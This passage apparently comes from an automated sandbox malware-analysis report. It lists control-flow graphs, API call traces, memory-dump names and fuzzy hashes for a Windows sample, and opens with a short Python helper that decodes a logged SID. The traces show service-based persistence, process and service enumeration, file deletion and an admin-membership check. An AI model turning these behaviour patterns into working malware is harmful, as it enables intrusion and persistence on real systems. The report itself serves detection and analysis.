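    # Argument list copied from the report's API entry for this function.
    line = ("AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,"
            "00000000,00000000,00000000,00000000,00000000,00000000,?)")
    sid, name = decode_logged_call(line)
    print(sid, name, sid_to_bytes(sid).hex())
```

Run as a script it decodes the report's own call. sid_to_bytes gives the byte pattern to search for in the .sdmp dumps listed for this function (for S-1-5-32-544: 01 02 00 00 00 00 00 05 20 00 00 00 20 02 00 00), and sid_from_bytes turns any hit back into a name.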

Control-flow Graph (basic blocks and edges; legend in the rendered graph: Executed / Not Executed, node colouring not preserved)

• 871: a42eb0-a42ef9 GetProcessHeap RtlFreeHeap -> 872, 873
• 872: a42f30-a42f42 -> 876, 877
• 873: a42efb-a42f07 -> 874, 875
• 874: a42f09-a42f19 (no successors listed)
• 875: a42f1a-a42f2f (no successors listed)
• 876: a42f44-a42f50 -> 877
• 877: a42f56-a42f57 (no successors listed)

APIs
• GetProcessHeap.KERNEL32(00000000,00A40367,?,00A40367,00000000), ref: 00A42ED1
• RtlFreeHeap.NTDLL(00000000,?,00A40367,00000000), ref: 00A42ED8
Memory Dump Source
• Source File: 00000005.00000002.2077154991.0000000000A31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A30000, based on PE: true
• Associated: 00000005.00000002.2077138911.0000000000A30000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077181409.0000000000A67000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077201160.0000000000A6C000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077201160.0000000000AA9000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077201160.0000000000ABA000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077261874.0000000000ABB000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_a30000_amdrhfskpcu.jbxd
Similarity
• API ID: Heap$FreeProcess
• String ID:
• API String ID: 3859560861-0
• Opcode ID: 51453e171365800b39587b640dfba2d7d373c1cef88367d0351b26f821e7243b
• Instruction ID: da7cebd527969591de45e92ccd45986466256c7db839162995e0fa9c7dc7db49
• Opcode Fuzzy Hash: 51453e171365800b39587b640dfba2d7d373c1cef88367d0351b26f821e7243b
• Instruction Fuzzy Hash: 5A019A39604249CBC314DBE4FE5552A37F9F7887207818306E00E8A2B2C33188A78B15

Control-flow Graph (basic blocks and edges; legend in the rendered graph: Executed / Not Executed, node colouring not preserved)

• 878: a3e2c0-a3e2e2 -> 879, 880
• 879: a3e2f2-a3e306 GetProcessHeap RtlAllocateHeap (no successors listed)
• 880: a3e2e4-a3e2ec -> 879

APIs
• GetProcessHeap.KERNEL32(00000000,?,?,00A6220A,02167FFC,?,?,?,?,00A5463C), ref: 00A3E2F8
• RtlAllocateHeap.NTDLL(00000000,?,00A6220A,02167FFC,?,?,?,?,00A5463C), ref: 00A3E2FF
Memory Dump Source
• Source File: 00000005.00000002.2077154991.0000000000A31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A30000, based on PE: true
• Associated: 00000005.00000002.2077138911.0000000000A30000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077181409.0000000000A67000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077201160.0000000000A6C000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077201160.0000000000AA9000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077201160.0000000000ABA000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077261874.0000000000ABB000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_a30000_amdrhfskpcu.jbxd
Similarity
• API ID: Heap$AllocateProcess
• String ID:
• API String ID: 1357844191-0
• Opcode ID: 0273fc1cbb152a6bc930267508da95e311d01b10d79e29cb0b8bb7c9b8b6878f
• Instruction ID: 115c3a2d1878f4645bd551f45ec073ce44982c9c4d5a53c4d0c7b7b110ce8786
• Opcode Fuzzy Hash: 0273fc1cbb152a6bc930267508da95e311d01b10d79e29cb0b8bb7c9b8b6878f
• Instruction Fuzzy Hash: 1CE04F761142009FCB04CBE5FC49A9A33B8EB04205B008119F60EC6261C671A5C38F95

Control-flow Graph (basic blocks and edges; legend in the rendered graph: Executed / Not Executed, node colouring not preserved)

• 881: a545a9-a545dc call a50610 -> 885, 886
• 885: a545de -> 886
• 886: a545e8-a54637 call a5fde0, call a49410, call a61660 -> 892
• 892: a5463c-a54654 -> 893, 894
• 893: a54656-a54667 -> 894
• 894: a5466d-a54699 call a5b150, ExitProcess (no successors listed)

APIs
Memory Dump Source
• Source File: 00000005.00000002.2077154991.0000000000A31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A30000, based on PE: true
• Associated: 00000005.00000002.2077138911.0000000000A30000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077181409.0000000000A67000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077201160.0000000000A6C000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077201160.0000000000AA9000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077201160.0000000000ABA000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077261874.0000000000ABB000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_a30000_amdrhfskpcu.jbxd
Similarity
• API ID: ExitProcess
• String ID:
• API String ID: 621844428-0
• Opcode ID: eed45312cf678ed519a7cd086c85abd0585a53cbef91f64656c42db4127056c6
• Instruction ID: f4d496f603e0242a49d50459535a6b9e1c5b029a3393182aa724177a304aec99
• Opcode Fuzzy Hash: eed45312cf678ed519a7cd086c85abd0585a53cbef91f64656c42db4127056c6
• Instruction Fuzzy Hash: 2F112B766101028FC700EFF0FE4A82637B0F7A63463058426E447861B9FB754557C782

Control-flow Graph (basic blocks and edges; legend in the rendered graph: Executed / Not Executed, node colouring not preserved)

• 897: a32800-a32832 call a5b150 -> 900, 901
• 900: a32834 -> 901
• 901: a3283e-a32842 ExitProcess (no successors listed)

APIs
Memory Dump Source
• Source File: 00000005.00000002.2077154991.0000000000A31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A30000, based on PE: true
• Associated: 00000005.00000002.2077138911.0000000000A30000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077181409.0000000000A67000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077201160.0000000000A6C000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077201160.0000000000AA9000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077201160.0000000000ABA000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077261874.0000000000ABB000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_a30000_amdrhfskpcu.jbxd
Similarity
• API ID: ExitProcess
• String ID:
• API String ID: 621844428-0
• Opcode ID: a3a0ff1febee31ff2595b58e54fabce9312fd878626ba8f54c38cbe7a8a19ffe
• Instruction ID: 769b970884b9b042a864c2ff9405fe195b8306b6ac39ac464c12490918a27c81
• Opcode Fuzzy Hash: a3a0ff1febee31ff2595b58e54fabce9312fd878626ba8f54c38cbe7a8a19ffe
• Instruction Fuzzy Hash: AAE0867C1002058BC354DFE4D8968763775EB45345754C11BE9560B2A1CA74A447DF91

Control-flow Graph (rendered graph image not recovered; legend: Executed / Not Executed)
• Basic blocks: a3a4e0-a3a53a (calls lstrlen), a3a53c-a3a548, a3a54e-a3a564
• Edges: a3a4e0 -> a3a54e, a3a4e0 -> a3a53c, a3a53c -> a3a54e
APIs
Memory Dump Source
• Source File: 00000005.00000002.2077154991.0000000000A31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A30000, based on PE: true
• Associated: 00000005.00000002.2077138911.0000000000A30000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077181409.0000000000A67000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077201160.0000000000A6C000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077201160.0000000000AA9000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077201160.0000000000ABA000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077261874.0000000000ABB000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_a30000_amdrhfskpcu.jbxd
Similarity
• API ID: lstrlen
• String ID:
• API String ID: 1659193697-0
• Opcode ID: fb6ad022c96201497fecab829161df29a9393a3e7afd10e341746d21400d6a0c
• Instruction ID: 33253f8a111a098c066300093cf6db2359c199d7a30ea3ed47c8416afab21d11
• Opcode Fuzzy Hash: fb6ad022c96201497fecab829161df29a9393a3e7afd10e341746d21400d6a0c
• Instruction Fuzzy Hash: 9CF0AF71250222EFC706DFE1FD0A0663BF8FB9E3613414002E449961B5E77848A3DF96
APIs
• OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 00A40537
• CreateServiceA.ADVAPI32(00000000,00F7E6B0,00F7E6B0,000F01FF,00000110,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00A40596
• ChangeServiceConfig2A.ADVAPI32(00000000,00000001,?), ref: 00A40615
• StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00A4062A
• CloseServiceHandle.ADVAPI32(00000000), ref: 00A406A7
• OpenServiceA.ADVAPI32(00000000,00F7E6B0,00000010), ref: 00A406EB
• StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00A4072D
• CloseServiceHandle.ADVAPI32(00000000), ref: 00A4073E
• CloseServiceHandle.ADVAPI32(00000000), ref: 00A407A8
Memory Dump Source
• Source File: 00000005.00000002.2077154991.0000000000A31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A30000, based on PE: true
• Associated: 00000005.00000002.2077138911.0000000000A30000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077181409.0000000000A67000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077201160.0000000000A6C000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077201160.0000000000AA9000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077201160.0000000000ABA000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077261874.0000000000ABB000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_a30000_amdrhfskpcu.jbxd
Similarity
• API ID: Service$CloseHandle$OpenStart$ChangeConfig2CreateManager
• String ID:
• API String ID: 3525021261-0
• Opcode ID: de8e159468b4f0bc8a9bb0894b80a4a299a9a1fb82c03c2f995eb625e9809858
• Instruction ID: ce417c1d91f3ce8d51d631607863670805ea07e0a46e1e558e61201db612544a
• Opcode Fuzzy Hash: de8e159468b4f0bc8a9bb0894b80a4a299a9a1fb82c03c2f995eb625e9809858
• Instruction Fuzzy Hash: 0C610D32A01210EFD301CFE4FC8AB663BB0FB85701F118606E546AA2B6D7B054A3DF45
APIs
• OpenSCManagerA.ADVAPI32(00000000,00000000,80000000), ref: 00A3B0AA
• EnumServicesStatusA.ADVAPI32(00000000,00000030,00000003,?,00000024,?,?,00000000), ref: 00A3B15A
• GetLastError.KERNEL32 ref: 00A3B17A
• EnumServicesStatusA.ADVAPI32(00000000,00000030,00000003,00000000,?,?,?,00000000), ref: 00A3B216
• CloseServiceHandle.ADVAPI32(00000000), ref: 00A3B41C
Memory Dump Source
• Source File: 00000005.00000002.2077154991.0000000000A31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A30000, based on PE: true
• Associated: 00000005.00000002.2077138911.0000000000A30000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077181409.0000000000A67000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077201160.0000000000A6C000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077201160.0000000000AA9000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077201160.0000000000ABA000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077261874.0000000000ABB000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_a30000_amdrhfskpcu.jbxd
Similarity
• API ID: EnumServicesStatus$CloseErrorHandleLastManagerOpenService
• String ID:
• API String ID: 1579346331-0
• Opcode ID: 1096e11805b1d408d25a6790cc0bdd99606469bfdccd1a57d342e1e3a1eb41ed
• Instruction ID: 445cd35e24f8a97e8b833ff1900e65b5adb00d07f1ff57f3b76efc3d26dd96be
• Opcode Fuzzy Hash: 1096e11805b1d408d25a6790cc0bdd99606469bfdccd1a57d342e1e3a1eb41ed
• Instruction Fuzzy Hash: 5FF158B2A10202DFC704DFE4FD857AA3BB1F794350F11821AE646972B6E7748893CB95
APIs
• Sleep.KERNEL32(000003E8,00000001), ref: 00A59679
• FindFirstFileA.KERNEL32(?,?), ref: 00A597B8
• DeleteFileA.KERNEL32(?), ref: 00A598A9
• FindNextFileA.KERNEL32(00000000,?), ref: 00A598CB
• FindClose.KERNEL32(00000000), ref: 00A598E4
Memory Dump Source
• Source File: 00000005.00000002.2077154991.0000000000A31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A30000, based on PE: true
• Associated: 00000005.00000002.2077138911.0000000000A30000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077181409.0000000000A67000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077201160.0000000000A6C000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077201160.0000000000AA9000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077201160.0000000000ABA000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077261874.0000000000ABB000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_a30000_amdrhfskpcu.jbxd
Similarity
• API ID: FileFind$CloseDeleteFirstNextSleep
• String ID:
• API String ID: 1528862845-0
• Opcode ID: 26deea10f89413d119bc0d3c803a3602e587578ddf8a2ced69b8a5936307c02b
• Instruction ID: a3d58b3399594d122d120d5f04eb7e5b9b38f5472d16f7701e955c1fcc323117
• Opcode Fuzzy Hash: 26deea10f89413d119bc0d3c803a3602e587578ddf8a2ced69b8a5936307c02b
• Instruction Fuzzy Hash: 1D911676900302DFC704DFE4FD865A637B0FB9A301B40861AE94A9B6B1EB744997CF51
APIs
• RegisterServiceCtrlHandlerA.ADVAPI32(00F7E6B0,Function_00011860), ref: 00A46D72
• SetServiceStatus.ADVAPI32(00000000,00AA05F8), ref: 00A46DD5
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00A46DE9
• SetServiceStatus.ADVAPI32(00000000,00AA05F8), ref: 00A46E8A
• WaitForSingleObject.KERNEL32(00000000,00001388), ref: 00A46EBE
• SetServiceStatus.ADVAPI32(00000000,00AA05F8), ref: 00A46F2B
• CloseHandle.KERNEL32(00000000), ref: 00A46F42
• SetServiceStatus.ADVAPI32(00000000,00AA05F8), ref: 00A46FAA
Strings
Memory Dump Source
• Source File: 00000005.00000002.2077154991.0000000000A31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A30000, based on PE: true
• Associated: 00000005.00000002.2077138911.0000000000A30000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077181409.0000000000A67000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077201160.0000000000A6C000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077201160.0000000000AA9000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077201160.0000000000ABA000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2077261874.0000000000ABB000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_a30000_amdrhfskpcu.jbxd
Similarity
• API ID: Service$Status$CloseCreateCtrlEventHandleHandlerObjectRegisterSingleWait
• String ID: =ZMI
                                                                                                                                                                                                            • API String ID: 3399922960-150576250
                                                                                                                                                                                                            • Opcode ID: c59585d34e5be1a0c39dee3d6b35e907823d28627476febd6b89b8f261f8c9f1
                                                                                                                                                                                                            • Instruction ID: 9b52648552593a5778e792c8ef0ac2980204434f91145e5263eef7a4b213864e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c59585d34e5be1a0c39dee3d6b35e907823d28627476febd6b89b8f261f8c9f1
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7891A875A01302CFD304CFE8FD8A9263BB5FB9A310B01C61AE45A862B5D77844A7CF46
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00A444A7
• Process32First.KERNEL32(00000000,?), ref: 00A445C2
• CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 00A447CE
• Module32First.KERNEL32(00000000,00000224), ref: 00A44842
• CloseHandle.KERNEL32(00000000,0000000A), ref: 00A4495A
• Process32Next.KERNEL32(?,00000128), ref: 00A449AD
• CloseHandle.KERNEL32(00000000), ref: 00A44A20
Similarity
• API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32$Module32Next
• String ID:
• API String ID: 930127669-0
• Opcode ID: 35dc4ec46c7b823aef5a53de2999291b85a681e27805a3dfe1dc80e4ba1f231a
• Instruction ID: 49e08c34100de70ce558eec95754fba04ea2fd7c6ef95ce187558c18034a9a3d
• Opcode Fuzzy Hash: 35dc4ec46c7b823aef5a53de2999291b85a681e27805a3dfe1dc80e4ba1f231a
• Instruction Fuzzy Hash: DAF14371A00202CFE704DFE9FC866693BB5F789311B01821AE44AC62B6EB7449E7CF51
APIs
• CreateFileA.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000), ref: 00A3CB20
• ReadFile.KERNEL32(00000000,?,?,?,00000000), ref: 00A3CB5D
• CloseHandle.KERNEL32(00000000), ref: 00A3CBBD
• GetTickCount.KERNEL32 ref: 00A3CC1D
• CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00A3CED4
• WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00A3CF0E
• CloseHandle.KERNEL32(00000000), ref: 00A3CF47
Similarity
• API ID: File$CloseCreateHandle$CountReadTickWrite
• String ID:
• API String ID: 3478262135-0
• Opcode ID: 4e670c0918ac8da224ea325960e5d88cdd03eade04c7de2470dd2a16c0f6e262
• Instruction ID: 8c257779c19ac687b70482483f60f8c7ed3b8783cbcc384463517b387fa4c27c
• Opcode Fuzzy Hash: 4e670c0918ac8da224ea325960e5d88cdd03eade04c7de2470dd2a16c0f6e262
• Instruction Fuzzy Hash: 73E14472A00201DFD704DFE4FD99AA937B4FB95720F10811AE44A9B2F5EB7049A3CB55
APIs
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,00A4E92E,00A4CA40,00000000,?), ref: 00A654B2
• CreateThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000), ref: 00A654E4
• CloseHandle.KERNEL32(00000000,?,00A4E92E,00A4CA40,00000000,?), ref: 00A6551D
• WaitForSingleObject.KERNEL32(?,000000FF,?,00A4E92E,00A4CA40,00000000,?), ref: 00A65538
• CloseHandle.KERNEL32(?,?,000000FF,?,00A4E92E,00A4CA40,00000000,?), ref: 00A6554B
Similarity
• API ID: CloseCreateHandle$EventObjectSingleThreadWait
• String ID:
• API String ID: 1404307249-0
• Opcode ID: 5ad323cc4031770fb6ecbd95b36ca535b0f891e548d2eea525ce2f7292b5a8d6
• Instruction ID: 215c1bd99f08ee1ed8c8d59e23a8217e5f3a2f6b9cc5e3a29d7dc0437d63e2bd
• Opcode Fuzzy Hash: 5ad323cc4031770fb6ecbd95b36ca535b0f891e548d2eea525ce2f7292b5a8d6
• Instruction Fuzzy Hash: 74319A30A00302DFD308CFA4EC55B627BF4FB58711F11C10AE64A9A6F0E7B08482CB94
APIs
• CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A3D11A
• ReadFile.KERNEL32(00000000,?,00005000,?,00000000), ref: 00A3D1CC
• CloseHandle.KERNEL32(00000000,?,00000000), ref: 00A3D3EE
• CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 00A3D2E9
  • Part of subcall function 00A5FCC0: ReleaseMutex.KERNEL32(00A3D410,?,00A3D410,00000124), ref: 00A5FCE9
Similarity
• API ID: CloseFileHandle$CreateMutexReadRelease
• String ID:
• API String ID: 1760212717-0
• Opcode ID: e02a80854afacdf2c570b97747e2d1baf9c1187ac199642f01ba4f368193e844
• Instruction ID: d3aafe448fd1fe2eb8ee35f2d5c27203a8ba157755f6e090e8070c71bcd5adb4
• Opcode Fuzzy Hash: e02a80854afacdf2c570b97747e2d1baf9c1187ac199642f01ba4f368193e844
• Instruction Fuzzy Hash: 87B144B2A00601DBD704DFE4FC8676A3BB5FBD8311F118156E549862F1EB7049A7CB82
APIs
• GetProcessHeap.KERNEL32(00000000,00000000,?,?,00A403A9,00000000,?), ref: 00A46957
• RtlReAllocateHeap.NTDLL(00000000,?,00A403A9,00000000), ref: 00A4695E
• GetProcessHeap.KERNEL32(00000000,?,?,00A403A9,00000000,?), ref: 00A469C8
• HeapAlloc.KERNEL32(00000000,?,00A403A9,00000000,?), ref: 00A469CF
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000005.00000002.2077154991.0000000000A31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077138911.0000000000A30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077181409.0000000000A67000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000A6C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000AA9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000ABA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077261874.0000000000ABB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_a30000_amdrhfskpcu.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$AllocAllocate
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1154092256-0
                                                                                                                                                                                                            • Opcode ID: 1366f8e83cec30296f4d264fe60031fc695a163b6fce106dd267c26d4b885b92
                                                                                                                                                                                                            • Instruction ID: 9e551574a25923334a05601fbc6cba99f61f3ae9c0274e63d74a3b322e013c0a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1366f8e83cec30296f4d264fe60031fc695a163b6fce106dd267c26d4b885b92
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0721C072A00601DFD705DFE1FE89A553F78F786310B628605D54A921B6EB3198B3CF61
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000005.00000002.2077154991.0000000000A31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077138911.0000000000A30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077181409.0000000000A67000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000A6C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000AA9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000ABA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077261874.0000000000ABB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_a30000_amdrhfskpcu.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: XH$/
                                                                                                                                                                                                            • API String ID: 0-571299465
                                                                                                                                                                                                            • Opcode ID: 655c91e7dfa10185b5f462ac1dbf03d0b5a084fd6e778f1bca01eab606fc198f
                                                                                                                                                                                                            • Instruction ID: 527bfe71cb5981a9bdd86815a3397d12b391aa472feaeaa7c7565e7abc18b9d2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 655c91e7dfa10185b5f462ac1dbf03d0b5a084fd6e778f1bca01eab606fc198f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CAF1DF31910212DBDB04EFE0FD92BBA37B8FB55311F00822AE54A561F2EB70499BCB50
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetSystemTime.KERNEL32(00A5247D,00000001,?,?,00A5247D), ref: 00A6518C
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00A652BE
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000005.00000002.2077154991.0000000000A31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077138911.0000000000A30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077181409.0000000000A67000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000A6C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000AA9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000ABA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077261874.0000000000ABB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_a30000_amdrhfskpcu.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CountSystemTickTime
                                                                                                                                                                                                            • String ID: @AB
                                                                                                                                                                                                            • API String ID: 2164215191-841575833
                                                                                                                                                                                                            • Opcode ID: c74745e614e743ec1cdb1bca26d92038d83242aea85fd3c5bfe3dfd70ad133ac
                                                                                                                                                                                                            • Instruction ID: 6f62f3329ec825d48679b0233fc0ec290a1f2640418363a609b0444e1603681e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c74745e614e743ec1cdb1bca26d92038d83242aea85fd3c5bfe3dfd70ad133ac
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6951CEB2A10601CFC308DFF9FD8A6263BB1F7993107058216D48AC72B5EB7498A7CB45

Execution Graph

Execution Coverage: 6%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 1713
Total number of Limit Nodes: 13
9975->9977 9980 150716 StartServiceA CloseServiceHandle 9976->9980 9981 15075e CloseServiceHandle 9976->9981 9979 15067e CloseServiceHandle 9977->9979 9979->9981 9980->9981 9981->9974 9985 157ab7 9984->9985 9986 142f90 2 API calls 9985->9986 9987 157b71 9986->9987 9988 151bb0 2 API calls 9987->9988 9989 157bcb 9988->9989 9990 157cc0 RegCloseKey 9989->9990 10313 14d500 lstrlen 9989->10313 9991 149c15 9990->9991 9991->9596 9993 157c87 RegSetValueExA 9993->9990 9995 16312e WaitForSingleObject 9994->9995 9997 149d15 9995->9997 9997->9609 9999 150de7 9998->9999 10000 150f4e CreateFileA 9999->10000 10001 150f80 10000->10001 10001->9625 10003 151254 10002->10003 10004 15126b 10002->10004 10005 150920 8 API calls 10003->10005 10006 142f90 2 API calls 10004->10006 10005->10004 10007 1512b3 10006->10007 10008 150dc0 CreateFileA 10007->10008 10009 1512cd 10008->10009 10010 151bb0 2 API calls 10009->10010 10011 15131f 10010->10011 10012 151378 Sleep 10011->10012 10022 151420 10011->10022 10013 142f90 2 API calls 10012->10013 10014 1513b7 10013->10014 10016 150dc0 CreateFileA 10014->10016 10018 1513cc 10016->10018 10017 15147c 10319 175370 CloseHandle 10017->10319 10021 151bb0 2 API calls 10018->10021 10020 14a090 10020->9630 10021->10022 10022->10020 10314 1510e0 10022->10314 10024 17587d wvsprintfA 10023->10024 10025 17586d 10023->10025 10024->9635 10025->10024 10026->9644 10028 14e2e4 10027->10028 10029 14e2f2 GetProcessHeap RtlAllocateHeap 10027->10029 10028->10029 10029->9654 10031 14b84e 10030->10031 10032 14b86a CheckTokenMembership 10031->10032 10033 14b887 10031->10033 10032->10033 10034 14fbc0 10033->10034 10035 14fc3c 10034->10035 10036 142f90 2 API calls 10035->10036 10037 14fc76 GetProcAddress 10036->10037 10038 151bb0 2 API calls 10037->10038 10039 14fcb4 10038->10039 